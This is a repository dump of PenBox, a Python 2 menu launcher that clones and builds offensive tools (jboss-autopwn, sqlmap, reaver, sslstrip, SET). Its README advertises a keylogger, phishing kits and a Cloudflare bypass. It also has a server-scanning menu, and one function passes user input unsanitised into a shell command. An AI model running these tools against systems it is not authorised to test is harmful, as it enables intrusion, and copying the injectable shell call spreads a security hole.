├── LICENSE.md ├── README.md ├── Versions ├── V1.0 │ └── penbox.py ├── V1.1 │ └── penbox.py ├── V1.2 │ └── penbox.py ├── V1.3 │ └── penbox.py ├── V1.4 │ └── penbox.py ├── V2.1 │ └── PenBox.py ├── V2.2 │ └── PenBox.py ├── V2.3 │ └── PenBox ├── V2.4 │ └── PenBox.py ├── V3.1 │ └── penbox.py └── V3.2 │ └── penbox.py └── penbox.py /LICENSE.md: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | THIS TOOL IS ONLY FOR EDUCATIONAL PURPOSES ONLY 3 | Copyright (c) 2016 Fedy Wesleti 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PenBox – A Penetration Testing Framework 2 | A Penetration Testing Framework , The Hacker’s Repo our hope is in the last version we will have evry script that a hacker needs 3 | #Information Gathering : 4 | + nmap 5 | + Setoolkit 6 | + Port Scanning 7 | + Host To IP 8 | + wordpress user enumeration 9 | + CMS scanner 10 | + XSStracer - checks remote web servers for Clickjacking, Cross-Frame Scripting, Cross-Site Tracing and Host Header Injection 11 | + Doork - Google Dorks Passive Vulnerability Auditor 12 | + Scan A server's Users 13 | 14 | # Password Attacks : 15 | + Cupp 16 | + Ncrack 17 | + AutoBrowser Screenshot 18 | 19 | # Wireless Testing : 20 | + reaver 21 | + pixiewps 22 | + Bluetooth Honeypot GUI Framework 23 | 24 | # Exploitation Tools : 25 | + Venom 26 | + sqlmap 27 | + Shellnoob 28 | + commix 29 | + FTP Auto Bypass 30 | + jboss-autopwn 31 | + Blind SQL Automatic Injection And Exploit 32 | + Bruteforce the Android Passcode given the hash and salt 33 | + Joomla, Mambo, PHP-Nuke, and XOOPS CMS SQL injection Scanner 34 | + cms Few 35 | + BLACKBOx 36 | + Liffy 37 | # Sniffing & Spoofing : 38 | + Setoolkit 39 | + SSLtrip 40 | + pyPISHER 41 | + SMTP Mailer 42 | 43 | # Web Hacking : 44 | + Drupal Hacking 45 | + Inurlbr 46 | + Wordpress & Joomla Scanner 47 | + Gravity Form Scanner 48 | + File Upload Checker 49 | + Wordpress Exploit Scanner 50 | + Wordpress Plugins Scanner 51 | + Shell and Directory Finder 52 | + Joomla! 
1.5 - 3.4.5 remote code execution 53 | + Vbulletin 5.X remote code execution 54 | + BruteX - Automatically brute force all services running on a target 55 | + Arachni - Web Application Security Scanner Framework 56 | + Sub-domain Scanning 57 | + Wordpress Scanning 58 | + Wordpress Username Enumeration 59 | + Wordpress Backup Grabbing 60 | + Sensitive File Detection 61 | + Same-Site Scripting Scanning 62 | + Click Jacking Detection 63 | + Powerful XSS vulnerability scanning 64 | + SQL Injection vulnerability scanning 65 | 66 | #Private Tools 67 | + Get all websites 68 | + Get joomla websites 69 | + Get wordpress websites 70 | + Find control panel 71 | + Find zip files 72 | + Find upload files 73 | + Get server users 74 | + Scan from SQL injection 75 | + Scan ports (range of ports) 76 | + Scan ports (common ports) 77 | + Get server banner 78 | + Bypass Cloudflare 79 | 80 | #Post Exploitation 81 | + Shell Checker 82 | + POET 83 | + Weeman - Phishing Framework 84 | + Insecure Web Interface 85 | + Insufficient Authentication/Authorization 86 | + Insecure Network Services 87 | + Lack of Transport Encryption 88 | + Privacy Concerns 89 | + Insecure Cloud Interface 90 | + Insecure Mobile Interface 91 | + Insufficient Security Configurability 92 | + Insecure Software/Firmware 93 | + Poor Physical Security 94 | + Radium-Keylogger - Python keylogger with multiple features 95 | 96 | #Recon 97 | + Sniper 98 | 99 | #Smartphones Penetration 100 | + Attach Framework to a Deployed Agent/Create Agent 101 | + Send Commands to an Agent 102 | + View Information Gathered 103 | + Attach Framework to a Mobile Modem 104 | + Run a remote attack 105 | + Run a social engineering or client side attack 106 | + Compile code to run on mobile devices 107 | + Install Stuff 108 | + Use Drozer 109 | + Setup API 110 | + Bruteforce the Android Passcode given the hash and salt 111 | 112 | #Others 113 | + QrlJacking-Framework 114 | + Sniffles - Packet Capture Generator for IDS and Regular Expression 
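Evaluation
#Installation
git clone https://github.com/x3omdax/PenBox.git
--------------------------------------------------------------------------------
/Versions/V1.0/penbox.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python2.7
#
# All In One Tool For Penetration Testing
# Authors : Fedy Wesleti , Mohamed Nour
#
import sys
import os
import subprocess
from commands import *
##########################
# Variables
# Answer sets for the y/n prompts.  In this version the empty string is in
# `yes`, so a bare Enter at any confirmation accepts (a download/build starts).
yes = set(['yes', 'y', 'ye', ''])
no = set(['no', 'n'])


##########################
# this is the big menu function
def menu():
    """Print the banner and top-level menu, then dispatch on the typed choice.

    The selection is read with raw_input(): the original used input(), which
    on Python 2 eval()s whatever is typed at the prompt, i.e. arbitrary code
    execution from the menu.  Non-numeric input re-displays the menu instead
    of raising ValueError.
    """
    print """
    ######## ######## ## ## ######## ####### ## ##
    ## ## ## ### ## ## ## ## ## ## ##
    ## ## ## #### ## ## ## ## ## ## ##
    ######## ###### ## ## ## ######## ## ## ###
    ## ## ## #### ## ## ## ## ## ##
    ## ## ## ### ## ## ## ## ## ##
    ## ######## ## ## ######## ####### ## ## v1.0
    Pentesting Tools Auto-Downloader

    [+] Coded BY Mohamed Nour & Fedy Weslety [+]
    [+] FB/CEH.TN ~~ FB/mohamed.zeus.0 [+]
    [+] Greetz To All Pentesters [+]

    Select from the menu:

    1 : Information Gathering
    2 : Password Attacks
    3 : Wireless Testing
    4 : Exploitation Tools
    5 : Sniffing & Spoofing
    99 : Exit

    """
    choice = raw_input("selet a number :")
    try:
        choice = int(choice)
    except ValueError:
        # Not a number: show the menu again rather than crash.
        menu()
        return
    if choice == 1:
        info()
    elif choice == 2:
        passwd()
    elif choice == 3:
        wire()
    elif choice == 4:
        exp()
    elif choice == 5:
        snif()
    elif choice == 99:
        os.system('clear')
        sys.exit()
# end of function
##########################
# nmap function
def nmap():
    """Offer to download and build nmap 7.01 from nmap.org.

    The tarball is fetched over HTTPS, but no signature or checksum is checked
    before it is compiled and (later) installed as root.  Verify the archive
    against nmap's published signature before trusting the build.
    """
    print("this step will download and install nmap ")
    print("yes or no ")
    choice7 = raw_input()
    if choice7 in yes :
        # Constant argv, no user input interpolated into a shell string.
        subprocess.call(["wget", "https://nmap.org/dist/nmap-7.01.tar.bz2"])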
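os.system("bzip2 -cd nmap-7.01.tar.bz2 | tar xvf -")
        # A bare os.system("cd nmap-7.01") only changes the directory of the
        # shell it spawns, so the original ./configure and make ran in the
        # wrong place.  Run each build step inside the source tree via cwd=.
        subprocess.call(["./configure"], cwd="nmap-7.01")
        subprocess.call(["make"], cwd="nmap-7.01")
        # os.system("su root") blocked on an interactive root shell, and the
        # following make install still ran as the original user once that
        # shell exited.  Require root explicitly instead of escalating mid-run.
        if os.getuid() != 0:
            print("make install needs root; re-run this script as root")
        else:
            subprocess.call(["make", "install"], cwd="nmap-7.01")
    elif choice7 in no :
        info()
####################################
# jboss-autopwn
def jboss():
    """Describe jboss-autopwn and offer to clone it; the script exits after cloning."""
    os.system('clear')
    print ("This JBoss script deploys a JSP shell on the target JBoss AS server. Once")
    print ("deployed, the script uses its upload and command execution capability to")
    print ("provide an interactive session.")
    print ("")
    print (" this will install jboss-autopwn")
    print ("usage : ./e.sh target_ip tcp_port ")
    choice9 = raw_input("yes / no :")
    if choice9 in yes:
        subprocess.call(["git", "clone", "https://github.com/SpiderLabs/jboss-autopwn.git"])
        sys.exit()
    elif choice9 in no:
        os.system('clear')
        exp()
# sqlmap
def sqlmap():
    """Offer to clone sqlmap into ./sqlmap-dev.

    Reads the answer with raw_input(): the original input() eval()'d it, so
    typing y raised NameError and any other text was executed as Python.
    Declining returns to the Exploitation menu this entry belongs to (the
    original jumped to Information Gathering).
    """
    print (" this will install sqlmap ")
    print ("usage : python sqlmap.py -h")
    choice8 = raw_input("yes or no :")
    if choice8 in yes:
        subprocess.call(["git", "clone", "https://github.com/sqlmapproject/sqlmap.git", "sqlmap-dev"])
    elif choice8 in no:
        os.system('clear')
        exp()

# setoolkit
def setoolkit():
    """Describe the Social-Engineer Toolkit and offer to clone and set it up."""
    print ("The Social-Engineer Toolkit is an open-source penetration testing framework")
    print(") designed for social engineering. SET has a number of custom attack vectors that ")
    print(" allow you to make a believable attack quickly. 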
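SET is a product of TrustedSec, LLC ")
    print("an information security consulting firm located in Cleveland, Ohio.")
    print("")
    choiceset = raw_input("y / n :")
    if choiceset in yes:
        subprocess.call(["git", "clone", "https://github.com/trustedsec/social-engineer-toolkit.git"])
        # os.system("cd ...") never changes this process's directory, so the
        # original ran setup.py from the wrong place; use cwd= instead.
        subprocess.call(["python", "setup.py"], cwd="social-engineer-toolkit")
    elif choiceset in no:
        os.system("clear")
        info()
# cupp
def cupp():
    """Offer to clone cupp (a password-list generator)."""
    print("cupp is a password list generator ")
    print("Usage: python cupp.py -h")
    print("yes or now")
    choicecupp = raw_input("y / n :")

    if choicecupp in yes:
        # The original "cd cupp" in its own shell was a no-op; nothing else runs.
        subprocess.call(["git", "clone", "https://github.com/Mebus/cupp.git"])
    elif choicecupp in no:
        os.system("clear")
        passwd()
# ncrack
def ncrack():
    """Offer to clone ruby-ncrack and install it as a gem.

    The original called os.systemgem(...), which does not exist and raised
    AttributeError; the intended command is `gem install ruby-ncrack`.
    """
    print("A Ruby interface to Ncrack, Network authentication cracking tool.")
    print("requires : nmap >= 0.3ALPHA / rprogram ~> 0.3")
    print("1 to accept / 0 to decline")
    choicencrack = raw_input("y / n :")
    if choicencrack in yes:
        subprocess.call(["git", "clone", "https://github.com/sophsec/ruby-ncrack.git"])
        subprocess.call(["gem", "install", "ruby-ncrack"])
    elif choicencrack in no:
        os.system("clear")
        passwd()
# reaver
def reaver():
    """Describe reaver and offer to install its build dependencies and compile it."""
    print("Reaver has been designed to be a robust and practical attack against Wi-Fi Protected Setup")
    print(" WPS registrar PINs in order to recover WPA/WPA2 passphrases. 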
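It has been tested against a")
    print(") wide variety of access points and WPS implementations")
    print("1 to accept / 0 to decline")
    # raw_input(), not input(): on Python 2 input() eval()s the answer, so
    # "y" raised NameError and arbitrary expressions were executed.
    creaver = raw_input("y / n :")
    if creaver in yes:
        os.system("apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps")
        subprocess.call(["git", "clone", "https://github.com/t6x/reaver-wps-fork-t6x.git"])
        # The chained os.system("cd ...") calls never changed the working
        # directory of this process; build inside src/ with cwd= instead.
        subprocess.call(["./configure"], cwd="reaver-wps-fork-t6x/src")
        subprocess.call(["make"], cwd="reaver-wps-fork-t6x/src")
    elif creaver in no:
        os.system("clear")
        wire()

#####################################
# information gathering function
def info():
    """Information Gathering submenu (this version: nmap and SET)."""
    print("1 : nmap ")
    print("3 : SET tool kit")
    print("99 :Go Back To Main Menu")
    choice2 = raw_input("selet a number :")
    try:
        choice2 = int(choice2)
    except ValueError:
        menu()
        return
    if choice2 == 1:
        os.system('clear')
        nmap()
    elif choice2 == 3:
        os.system("clear")
        setoolkit()
    elif choice2 == 99:
        os.system("clear")
        menu()
# end of menu
##########################
# password attacks menu
def passwd():
    """Password Attacks submenu (cupp, Ncrack)."""
    print("1 : cupp ")
    print("2 : Ncrack")
    print("99:Back To Main Menu")
    choice3 = raw_input("selet a number :")
    try:
        choice3 = int(choice3)
    except ValueError:
        menu()
        return
    if choice3 == 1:
        os.system("clear")
        cupp()
    elif choice3 == 2:
        os.system("clear")
        ncrack()
    elif choice3 == 99:
        os.system("clear")
        menu()
# end of menu
##########################
# wireless attacks
def wire():
    """Wireless Testing submenu (reaver)."""
    print("1 : reaver ")
    print("99: Go Back To The Main Menu")
    choice4 = raw_input("selet a number :")
    try:
        choice4 = int(choice4)
    except ValueError:
        menu()
        return
    if choice4 == 1:
        os.system("clear")
        reaver()
    elif choice4 == 99:
        menu()
##########################
# exploitation tools
def exp():
    """Exploitation Tools submenu (jboss-autopwn, sqlmap)."""
    print("1 : jboss-autopwn ")
    print("2 : sqlmap")
    print("99 : Go Back To Main Menu")
    # raw_input() instead of input(): no eval() of the typed text.
    choice5 = raw_input("selet a number :")
    choice5 = 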
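int(choice5)
    if choice5 == 2:
        os.system("clear")
        sqlmap()
    elif choice5 == 1:
        os.system('clear')
        jboss()
    elif choice5 == 99:
        menu()
###########################
# sniffing tools
def snif():
    """Sniffing & Spoofing submenu (this version: SET only)."""
    print("1 : Set Tool kit ")
    print("99: Back To Main Menu")
    choice6 = raw_input("selet a number :")
    try:
        choice6 = int(choice6)
    except ValueError:
        menu()
        return
    if choice6 == 1:
        os.system("clear")
        setoolkit()
    elif choice6 == 99:
        os.system("clear")
        menu()
# end of menu
##########################
# Check use OS
def OS():
    """Ask which OS we run on; Linux goes through the root check, others to the menu.

    The original compared str(input(":")) with the integer 2, which is never
    true, so root() was unreachable (and input() eval()'d the answer).
    """
    print(
    """
    Choose Operating System :
    1) Max OSX
    2) Linux
    3) Windows
    """)
    system = raw_input(":")
    if system == "2":
        root()
    else :
        menu()

############################
# check root if linux
def root():
    """Exit unless running as uid 0, otherwise continue to the main menu.

    The original returned silently when already root, so the script ended
    without ever showing the menu on the Linux path.
    """
    if os.getuid() != 0:
        print("Are you root? Please execute as root")
        exit()
    else:
        menu()
#############################
# begin :D
OS()





--------------------------------------------------------------------------------
/Versions/V1.1/penbox.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python2.7
#
# All In One Tool For Penetration Testing
# Authors : Fedy Wesleti , Mohamed Nour
#
import sys
import os
import httplib
import subprocess
import re, urllib2
import socket
import urllib,sys,json
from commands import *
from platform import system
from urlparse import urlparse
##########################
# Variables
# Answer sets for the y/n prompts (an empty answer is neither, unlike V1.0).
yes = set(['yes', 'y', 'ye', 'Y'])
no = set(['no', 'n'])
def logo():
    """Print the PenBox banner."""
    print """
    ######## ######## ## ## ######## ####### ## ##
    ## ## ## ### ## ## ## ## ## ## ##
    ## ## ## #### ## ## ## ## ## ## ##
    ######## ###### ## ## ## ######## ## ## ###
    ## ## ## #### ## ## ## ##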
## ## 27 | ## ## ## ### ## ## ## ## ## ## 28 | ## ######## ## ## ######## ####### ## ## v1.0 29 | Pentesting Tools Auto-Downloader 30 | 31 | [+] Coded BY Mohamed Nour & Fedy Weslety [+] 32 | [+] FB/CEH.TN ~~ FB/mohamed.zeus.0 [+] 33 | [+] Greetz To All Pentesters [+] 34 | """ 35 | ########################## 36 | #this is the big menu funtion 37 | def menu(): 38 | print (""" 39 | ######## ######## ## ## ######## ####### ## ## 40 | ## ## ## ### ## ## ## ## ## ## ## 41 | ## ## ## #### ## ## ## ## ## ## ## 42 | ######## ###### ## ## ## ######## ## ## ### 43 | ## ## ## #### ## ## ## ## ## ## 44 | ## ## ## ### ## ## ## ## ## ## 45 | ## ######## ## ## ######## ####### ## ## v1.0 46 | Pentesting Tools Auto-Downloader 47 | 48 | [+] Coded BY Mohamed Nour & Fedy Weslety [+] 49 | [+] FB/CEH.TN ~~ FB/mohamed.zeus.0 [+] 50 | [+] Greetz To All Pentesters [+] 51 | 52 | Select from the menu: 53 | 54 | 1 : Information Gathering 55 | 2 : Password Attacks 56 | 3 : Wireless Testing 57 | 4 : Exploitation Tools 58 | 5 : Sniffing & Spoofing 59 | 6 : Privat Tools 60 | 7 : Drupal Hacking 61 | 99 : Exit 62 | 63 | """) 64 | choice = raw_input("Enter Your Choice:") 65 | 66 | if choice == "1": 67 | info() 68 | elif choice == "2": 69 | passwd() 70 | elif choice == "3": 71 | wire() 72 | elif choice == "4": 73 | exp() 74 | elif choice == "5": 75 | snif() 76 | elif choice == "6": 77 | tnn() 78 | elif choice == "7": 79 | maine() 80 | elif choice == "99": 81 | os.system('clear'),sys.exit(); 82 | elif choice == "": 83 | menu() 84 | else: 85 | menu() 86 | ########################## 87 | #Host 2 ip 88 | def h2ip(): 89 | host = raw_input("Select A Host : ") 90 | ips = socket.gethostbyname(host) 91 | print(ips) 92 | ########################## 93 | #ports 94 | def ports(): 95 | os.system("clear") 96 | target = raw_input('Select a Target IP :') 97 | os.system("nmap -O -Pn %s" % target) 98 | sys.exit(); 99 | ########################## 100 | #inurlbr 101 | def ifinurl(): 102 | print""" This Advanced search in 
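search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found."""
    print('do you have Inurlbr installed ? ')
    cinurl = raw_input("Y / N : ")
    if cinurl in yes:
        inurl()
    elif cinurl in no:
        insinurl()
    else:
        # Empty or unknown answer: back to the main menu.
        menu()
####################################
def inurl():
    """Prompt for a dork and an output name and run ./inurlbr.php with them.

    The arguments are passed as an argv list rather than interpolated into a
    shell string: the original `--dork '{0}'` let a dork containing a single
    quote break out of the quoting and run arbitrary commands.  The original
    also referenced the undefined name `cinurl` after the scan (NameError);
    the scan now simply returns to the main menu.
    """
    dork = raw_input("select a Dork:")
    output = raw_input("select a file to save :")
    subprocess.call(["./inurlbr.php", "--dork", dork, "-s", output + ".txt", "-q", "1,6", "-t", "1"])
    menu()
####################################
def insinurl():
    """Clone SCANNER-INURLBR, install its PHP/curl dependencies and move the script here.

    The original moved /SCANNER-INURLBR/inurbr.php (absolute path plus a typo
    in the file name), so the move always failed and inurl() then ran a
    script that was not there.
    """
    subprocess.call(["git", "clone", "https://github.com/googleinurl/SCANNER-INURLBR.git"])
    os.system("chmod +x SCANNER-INURLBR/inurlbr.php")
    os.system("apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl")
    os.system("mv SCANNER-INURLBR/inurlbr.php inurlbr.php")
    os.system("clear")
    inurl()
####################################
# nmap function
def nmap():
    """Download, build and (as root) install nmap 7.01 from nmap.org.

    No signature or checksum check is done on the tarball before it is built
    and installed; verify it against nmap's published signature first.
    """
    choice7 = raw_input("continue ? Y / N : ")
    if choice7 in yes :
        subprocess.call(["wget", "https://nmap.org/dist/nmap-7.01.tar.bz2"])
        os.system("bzip2 -cd nmap-7.01.tar.bz2 | tar xvf -")
        # "cd X & cmd" backgrounds the cd and runs cmd in the current
        # directory; run each build step inside the source tree with cwd=.
        subprocess.call(["./configure"], cwd="nmap-7.01")
        subprocess.call(["make"], cwd="nmap-7.01")
        # os.system("su root") blocked on an interactive shell and did not make
        # the following make install run as root; require root explicitly.
        if os.getuid() != 0:
            print("make install needs root; re-run this script as root")
        else:
            subprocess.call(["make", "install"], cwd="nmap-7.01")
    elif choice7 in no :
        info()
    else:
        menu()
####################################
# jboss-autopwn
def jboss():
    """Describe jboss-autopwn and offer to clone it; the script exits after cloning."""
    os.system('clear')
    print ("This JBoss script deploys a JSP shell on the target JBoss AS server.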
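Once")
    print ("deployed, the script uses its upload and command execution capability to")
    print ("provide an interactive session.")
    print ("")
    print ("usage : ./e.sh target_ip tcp_port ")
    print("Continue: y/n")
    choice9 = raw_input("yes / no :")
    if choice9 in yes:
        subprocess.call(["git", "clone", "https://github.com/SpiderLabs/jboss-autopwn.git"])
        sys.exit()
    elif choice9 in no:
        os.system('clear')
        exp()
    else:
        menu()
####################################
# sqlmap
def sqlmap():
    """Offer to clone sqlmap into ./sqlmap-dev.

    The original command ended in " & ", which backgrounded the clone and
    returned before it had finished.  Declining now returns to the
    Exploitation menu this entry lives in, not Information Gathering.
    """
    print ("usage : python sqlmap.py -h")
    choice8 = raw_input("Continue: y/n :")
    if choice8 in yes:
        subprocess.call(["git", "clone", "https://github.com/sqlmapproject/sqlmap.git", "sqlmap-dev"])
    elif choice8 in no:
        os.system('clear')
        exp()
    else:
        menu()
####################################
# setoolkit
def setoolkit():
    """Describe the Social-Engineer Toolkit and offer to clone and set it up."""
    print ("The Social-Engineer Toolkit is an open-source penetration testing framework")
    print(") designed for social engineering. SET has a number of custom attack vectors that ")
    print(" allow you to make a believable attack quickly. 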
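SET is a product of TrustedSec, LLC ")
    print("an information security consulting firm located in Cleveland, Ohio.")
    print("")
    choiceset = raw_input("y / n :")
    if choiceset in yes:
        subprocess.call(["git", "clone", "https://github.com/trustedsec/social-engineer-toolkit.git"])
        # Run setup.py from inside the clone so its relative paths resolve.
        subprocess.call(["python", "setup.py"], cwd="social-engineer-toolkit")
        # The original if/if/elif chain fell through to menu() after installing.
        menu()
    elif choiceset in no:
        os.system("clear")
        info()
    else:
        menu()
####################################
# cupp
def cupp():
    """Offer to clone cupp (a password-list generator)."""
    print("cupp is a password list generator ")
    print("Usage: python cupp.py -h")
    choicecupp = raw_input("Continue: y/n : ")

    if choicecupp in yes:
        subprocess.call(["git", "clone", "https://github.com/Mebus/cupp.git"])
        print("file downloaded successfully")
    elif choicecupp in no:
        os.system("clear")
        passwd()
    else:
        menu()
####################################
# ncrack
def ncrack():
    """Offer to clone ruby-ncrack and install it as a gem.

    The original ran os.system("install ruby-ncrack") after a no-op "cd";
    the intended command is `gem install ruby-ncrack` (see V1.0).
    """
    print("A Ruby interface to Ncrack, Network authentication cracking tool.")
    print("requires : nmap >= 0.3ALPHA / rprogram ~> 0.3")
    print("Continue: y/n")
    choicencrack = raw_input("y / n :")
    if choicencrack in yes:
        subprocess.call(["git", "clone", "https://github.com/sophsec/ruby-ncrack.git"])
        subprocess.call(["gem", "install", "ruby-ncrack"])
    elif choicencrack in no:
        os.system("clear")
        passwd()
    else:
        menu()
####################################
# reaver
def reaver():
    """Describe reaver and offer to install its build dependencies and compile it."""
    print """
    Reaver has been designed to be a robust and practical attack against Wi-Fi Protected Setup
    WPS registrar PINs in order to recover WPA/WPA2 passphrases. 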
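It has been tested against a
    wide variety of access points and WPS implementations
    1 to accept / 0 to decline
    """
    creaver = raw_input("y / n :")
    if creaver in yes:
        os.system("apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps")
        subprocess.call(["git", "clone", "https://github.com/t6x/reaver-wps-fork-t6x.git"])
        # "cd dir & cmd" backgrounds the cd and runs cmd in the current
        # directory; build inside src/ with cwd= instead.
        subprocess.call(["./configure"], cwd="reaver-wps-fork-t6x/src")
        subprocess.call(["make"], cwd="reaver-wps-fork-t6x/src")
    elif creaver in no:
        os.system("clear")
        wire()
    else:
        menu()
####################################
# sslstrip
def ssls():
    """Offer to clone sslstrip, install python-twisted-web and run its setup.py."""
    print"""sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping
    attacks.
    It requires Python 2.5 or newer, along with the 'twisted' python module."""
    cssl = raw_input("y / n :")
    if cssl in yes:
        subprocess.call(["git", "clone", "https://github.com/moxie0/sslstrip.git"])
        os.system("sudo apt-get install python-twisted-web")
        # Run from inside the clone so setup.py's relative paths resolve.
        # NOTE(review): setup.py is invoked with no command, as in the original;
        # a distutils-style setup.py does nothing useful without e.g. `install`.
        subprocess.call(["python", "setup.py"], cwd="sslstrip")
        # The original if/if/elif chain fell through to menu() after installing.
        menu()
    elif cssl in no:
        snif()
    else:
        menu()
####################################
# shellnoob
def shellnoob():
    """Offer to clone ShellNoob and run its --install step with sudo."""
    print """Writing shellcodes has always been super fun, but some parts are extremely boring and error prone. 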
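Focus only on the fun part, and use ShellNoob!"""
    cshell = raw_input("Y / N : ")
    if cshell in yes:
        subprocess.call(["git", "clone", "https://github.com/reyammer/shellnoob.git"])
        os.system("mv shellnoob/shellnoob.py shellnoob.py")
        os.system("sudo python shellnoob.py --install")
        # The original if/if/elif chain fell through to menu() after installing.
        menu()
    elif cshell in no:
        exp()
    else:
        menu()
#####################################
# information gathering function
def info():
    """Information Gathering submenu; every path ends back in menu()."""
    print("1: nmap ")
    print("2: Setoolkit")
    print("3: Port Scanning")
    print("4: Host To IP")
    print("99: Back To Main Menu")
    choice2 = raw_input("Select from the menu:")
    if choice2 == "1":
        os.system('clear')
        nmap()
    elif choice2 == "2":
        os.system("clear")
        setoolkit()
    elif choice2 == "3":
        os.system("clear")
        ports()
    elif choice2 == "4":
        os.system("clear")
        h2ip()
    elif choice2 == "99":
        os.system("clear")
    # The original if/if/elif chain reached menu() after every tool returned
    # (and for "99", "" and unknown input); keep that so the program loops.
    menu()
##########################
def priv8():
    """Private Tools entry; delegates to tnn() (defined elsewhere in this file)."""
    tnn()
# password attacks menu
def passwd():
    """Password Attacks submenu (cupp, Ncrack).

    Returns to the main menu after the chosen tool, like info()/exp()/snif();
    the original returned up the call stack instead, ending the program.
    """
    print("1: cupp ")
    print("2: Ncrack")
    print("99: Back To Main Menu")
    choice3 = raw_input("Select from the menu:")
    if choice3 == "1":
        os.system("clear")
        cupp()
    elif choice3 == "2":
        os.system("clear")
        ncrack()
    elif choice3 == "99":
        os.system("clear")
    menu()
##########################
# wireless attacks
def wire():
    """Wireless Testing submenu (reaver); returns to the main menu afterwards."""
    print("1: reaver ")
    print("99: Back To The Main Menu")
    choice4 = raw_input("Select from the menu:")
    if choice4 == "1":
        os.system("clear")
        reaver()
    menu()
##########################
# exploitation tools
def exp():
    """Exploitation Tools submenu; every path ends back in menu()."""
    print("1 : 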
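jboss-autopwn ")
    print("2 : sqlmap")
    print("3 : Shellnoob")
    print("4 : Inurlbr")
    print("99 : Go Back To Main Menu")
    choice5 = raw_input("Select from the menu:")
    if choice5 == "1":
        os.system('clear')
        jboss()
    elif choice5 == "2":
        os.system("clear")
        sqlmap()
    elif choice5 == "3":
        os.system("clear")
        shellnoob()
    elif choice5 == "4":
        os.system("clear")
        ifinurl()
    # Every path ("99", "", unknown, or after a tool returns) goes back to menu().
    menu()
###########################
# sniffing tools
def snif():
    """Sniffing & Spoofing submenu (SET, sslstrip); every path ends back in menu()."""
    print("1 : Setoolkit ")
    print("2 : Ssltrip")
    print("99: Back To Main Menu")
    choice6 = raw_input("Select from the menu:")
    if choice6 == "1":
        os.system("clear")
        setoolkit()
    elif choice6 == "2":
        os.system("clear")
        ssls()
    elif choice6 == "99":
        os.system("clear")
    menu()
##########################
# if Os is Windows
def win():
    """Windows is unsupported: say so and exit."""
    os.system("clear")
    print("Our Tool Does Not Support Windows , run it on linux or install a virtual machine ")
    sys.exit()
# Check use OS
##########################
def OS():
    """Ask for the host OS; Linux goes through the root check, Mac straight to the menu.

    The original had these two swapped (Linux -> menu(), Mac -> root()),
    which skipped the "check root if linux" step that the apt-get and
    make install paths depend on (V1.0 routed Linux to root()).
    """
    print(
    """
    Choose Operating System :
    1) Mac OSX
    2) Linux
    3) Windows
    """)
    system = raw_input("choose an OS : ")
    if system == "2":
        root()
    elif system == "1":
        menu()
    elif system == "3":
        win()
    elif system == "":
        OS()
    else:
        sys.exit()
############################
# check root if linux
def root():
    """Exit unless running as uid 0, otherwise continue to the main menu."""
    if os.getuid() != 0:
        print("Are you root? 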
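Please execute as root")
        exit()
    else:
        menu()
#############################
# priv8 menu
menuu = """
 1) Get all websites
 2) Get joomla websites
 3) Get wordpress websites
 4) Find control panel
 5) Find zip files
 6) Find upload files
 7) Get server users
 8) Scan from SQL injection
 9) Crawl and scan from SQL injection
 10) Scan ports (range of ports)
 11) Scan ports (common ports)
 12) Get server banner
 13) Bypass Cloudflare
 99) Exit
"""
#############################
# grab function
def unique(seq):
    """Return the elements of seq in first-seen order with duplicates removed."""
    seen = set()
    kept = []
    for item in seq:
        if item not in seen:
            seen.add(item)
            kept.append(item)
    return kept
############################
# clear screen function
def clearScr() :
    """Clear the terminal on GNU/Linux (clear) or Windows (cls); no-op elsewhere."""
    if system() == 'Linux':
        os.system('clear')
    if system() == 'Windows':
        os.system('cls')
############################
class TNscan : # TNscan Function menu
    def __init__(self, serverip) :
        """Grab the sites hosted on serverip, then loop over the private-tools menu.

        serverip is used verbatim in Bing queries, HTTP requests and socket
        connects against third-party hosts; it is not validated here.  Only
        point this at infrastructure you are authorised to test (the licence
        restricts the tool to educational use).
        """
        self.serverip = serverip
        self.getSites(False)
        print menuu
        while True :
            choice = raw_input(' Enter choice -> ')
            if choice == '1' :
                self.getSites(True)
            elif choice == '2' :
                self.getJoomla()
            elif choice == '3' :
                self.getWordpress()
            elif choice == '4' :
                self.findPanels()
            elif choice == '5' :
                self.findZip()
            elif choice == '6' :
                self.findUp()
            elif choice == '7' :
                self.getUsers()
            elif choice == '8' :
                self.grabSqli()
            elif choice == '9' :
                try:
                    nbpages = int(raw_input(' Enter number of pages to crawl (ex : 100) -> '))
                except ValueError:
                    # Non-numeric page count used to raise and end the session.
                    print ' Not a number'
                    continue
                self.crawlSqli(nbpages)
            elif choice == '10' :
                ran = raw_input(' Enter range of ports, (ex : 1-1000) -> ')
                self.portScanner(1, ran)
            elif 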
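choice == '11' :
                self.portScanner(2, None)
            elif choice == '12' :
                self.getServerBanner()
            elif choice == '13' :
                self.cloudflareBypasser()
            elif choice == '99' :
                print ' Goodbye'
                exit()
            con = raw_input(' Continue [Y/n] -> ')
            # con[0] raised IndexError on a bare Enter; con[:1] is '' then and
            # falls through to "continue", which is the documented default.
            if con[:1].upper() == 'N' :
                exit()
            else :
                clearScr()
                print menuu
    ############################
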